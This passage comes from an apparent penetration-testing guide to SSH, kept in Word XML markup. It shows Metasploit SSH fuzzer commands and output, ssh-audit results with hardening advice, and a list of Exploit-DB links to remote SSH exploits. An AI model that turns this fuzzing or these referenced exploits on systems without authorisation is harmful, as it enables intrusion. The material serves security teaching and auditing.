    <w:p w14:paraId="5F84BD0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auxiliary(fuzzers/ssh/ssh_version_2) &gt; set RHOSTS 192.168.1.94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02558EF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msf5 auxiliary(fuzzers/ssh/ssh_version_2) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A5B2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Running module against 192.168.1.94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506763D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296F532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192.168.1.94:22 - Fuzzing with iteration 100 using fuzzer_string_giant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5E3A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 192.168.1.94:22 - Fuzzing with iteration 200 using fuzzer_string_giant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8B210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192.168.1.94:22 - Fuzzing with iteration 300 using fuzzer_string_long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F25E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192.168.1.94:22 - Fuzzing with iteration 400 using fuzzer_string_long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE856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192.168.1.94:22 - Fuzzing with iteration 500 using fuzzer_string_paths_giant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1BDB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192.168.1.94:22 - Fuzzing with iteration 600 using fuzzer_string_paths_giant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC8709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192.168.1.94:22 - Fuzzing with iteration 700 using fuzzer_string_paths_giant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A936F6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192.168.1.94:22 - Fuzzing with iteration 800 using fuzzer_string_paths_giant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252483B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192.168.1.94:22 - Fuzzing with iteration 900 using fuzzer_string_paths_giant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE45D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192.168.1.94:22 - Fuzzing with iteration 1000 using fuzzer_string_paths_giant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A500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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184DE1B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lastRenderedPageBreak/>
        <w:t>Using those tools is easy but you have low chance of finding something exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED9A90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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>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Custom &amp; manual approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F37946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If you want to find more significant results and have the time to familiarize yourself with the targeted implementation you can opt for a manual approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244A88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Here the technique is to use an advanced generic fuzzer on a self-run SSH server and modify the source code to optimize the test execution time. So it will require to configure the fuzzer, configure and build the targeted implementation, detecting the crashes, reducing the use of resource-intensive functions to make the fuzz faster, increasing coverage, create input test-cases and input dictionaries and having a deep understanding of the SSH protocol and of the implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F031C8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Here is an example of </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Vegard Nossum</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Fuzzing the OpenSSH daemon using AFL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656AA28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textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Related Tools &amp; Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E96769"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8ED1FC"/>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w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>HASSH</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>” is a network fingerprinting standard which can be used to identify specific Client and Server SSH implementations. The fingerprints can be easily stored, searched and shared in the form of an MD5 fingerprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03310F9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HASSH is a standard that helps blue teams to detect, control and investigate brute force or credential stuffing password attempts, exfiltration of data, network discovery and lateral movement, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C301C0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hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>ssh-audit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> is an SSH server auditing tool (banner, key exchange, encryption, mac, compression, compatibility, security, etc).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF076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lastRenderedPageBreak/>
        <w:t>It’s handy for professional pentesters to quickly detect the target version and knowing which algorithms are available on the remote server to be able to give algorithm recommendations to the customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC4F0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Example of use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4031A9B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ssh-audit 192.168.1.94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C48703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general</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205408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(gen) banner: SSH-2.0-OpenSSH_7.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E883E8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(gen) software: OpenSSH 7.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3743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(gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E649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(gen) compression: enabled (zlib@openssh.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0572A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1B0D733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key exchange algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A2ED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(kex) curve25519-sha256                     -- [warn] unknown algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3E5D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(kex) curve25519-sha256@libssh.org          -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B854D22"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(kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ECFDF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5.7, Dropbear SSH 2013.62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D9082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(kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521AF5B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5.7, Dropbear SSH 2013.62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F51721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(kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22933C9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5.7, Dropbear SSH 2013.62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058945E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(kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B73D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4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA8503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(kex) diffie-hellman-group16-sha512         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671ABFC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(kex) diffie-hellman-group18-sha512         -- [info] available since OpenSSH 7.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083BEEB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(kex) diffie-hellman-group14-sha256         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E40B50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(kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136D6DE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 xml:space="preserve">                                            `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E6F7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72A710A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host-key algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E37C4F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(key) rsa-sha2-512                          -- [info] available since OpenSSH 7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8D1FC4"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(key) rsa-sha2-256                          -- [info] available since OpenSSH 7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D084D5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(key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CB43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(key) ecdsa-sha2-nistp256                   -- [fail] using weak elliptic curves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB5EA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[warn] using weak random number generator could reveal the key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A117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5.7, Dropbear SSH 2013.62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9DE1C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(key) ssh-ed25519                           -- [info] available since OpenSSH 6.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EC0C7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14A7751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encryption algorithms (ciphers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743EC3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(enc) chacha20-poly1305@openssh.com         -- [info] available since OpenSSH 6.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9D34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default cipher since OpenSSH 6.9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BBD1D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(enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706F018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(enc) aes192-ctr                            -- [info] available since OpenSSH 3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A3D6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(enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5133976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(enc) aes128-gcm@openssh.com                -- [info] available since OpenSSH 6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434325C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(enc) aes256-gcm@openssh.com                -- [info] available since OpenSSH 6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020E00D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6E430A0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message authentication code algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE3904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(mac) umac-64-etm@openssh.com               -- [warn] using small 64-bit tag size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61238C8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6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD3C80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(mac) umac-128-etm@openssh.com              -- [info] available since OpenSSH 6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AC8C7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(mac) hmac-sha2-256-etm@openssh.com         -- [info] available since OpenSSH 6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496146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(mac) hmac-sha2-512-etm@openssh.com         -- [info] available since OpenSSH 6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C99F62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(mac) hmac-sha1-etm@openssh.com             -- [warn] using weak hashing algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59853997"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6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF469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(mac) umac-64@openssh.com                   -- [warn] using encrypt-and-MAC mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4529C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[warn] using small 64-bit tag size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5FFC2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4.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5A181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(mac) umac-128@openssh.com                  -- [warn] using encrypt-and-MAC mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C4C1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6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF8DE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(mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C53D3A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5.9, Dropbear SSH 2013.56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EC57E2"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(mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F4503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5.9, Dropbear SSH 2013.56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB73DE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(mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CDB50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[warn] using weak hashing algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA6DB0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                                            `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CB32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p>
    <w:p w14:paraId="65E2517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algorithm recommendations (for OpenSSH 7.9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365CEC5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-ecdh-sha2-nistp521                   -- kex algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4C8B0"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-ecdh-sha2-nistp384                   -- kex algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3C90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 xml:space="preserve">(rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2774CBA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-ecdh-sha2-nistp256                   -- kex algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B53D3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-diffie-hellman-group-exchange-sha256 -- kex algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9B993"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-ecdsa-sha2-nistp256                  -- key algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5451136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-hmac-sha2-512                        -- mac algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4561DF1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-umac-128@openssh.com                 -- mac algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B911B5"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-hmac-sha2-256                        -- mac algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E9331C"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-umac-64@openssh.com                  -- mac algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A714B"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-hmac-sha1                            -- mac algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B925F6"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bdr w:val="single" w:sz="2" w:space="9" w:color="auto" w:frame="1"/>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t xml:space="preserve">(rec) -hmac-sha1-etm@openssh.com            -- mac algorithm to remove </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF20E6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ucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="9" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(rec) -umac-64-etm@openssh.com              -- mac algorithm to remove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320776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240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>General Exploit Dev Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91F53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Though (beyond this article) not much really exists for SSH specific exploit development, many of the same general trends apply. Many books &amp; articles have covered the development of zero-day stack &amp; heap-based exploits in detail, some of which are covered in the appropriate sections of our </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:anchor="Exploit_Development_Books" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>books and resources</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> page. (TLDR; </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Corelan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> &amp; </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Shellcoders Hackers Handbook</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> are still the best).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A66A1"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Some of the most notable remote SSH exploits of recent times are listed below as a quick non-comprehensive shortlist –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBFE1F6" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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35" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/18557</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> ~ Sysax 5.53 – SSH ‘Username’ Remote Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C9268" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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36" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/45001</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> ~ OpenSSH &lt; 6.6 SFTP – Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139952F6" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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37" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/45233</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> ~ OpenSSH 2.3 &lt; 7.7 – Username Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C105D2A" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="450" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/46516</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> ~ OpenSSH SCP Client – Write Arbitrary Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2FE22"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textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
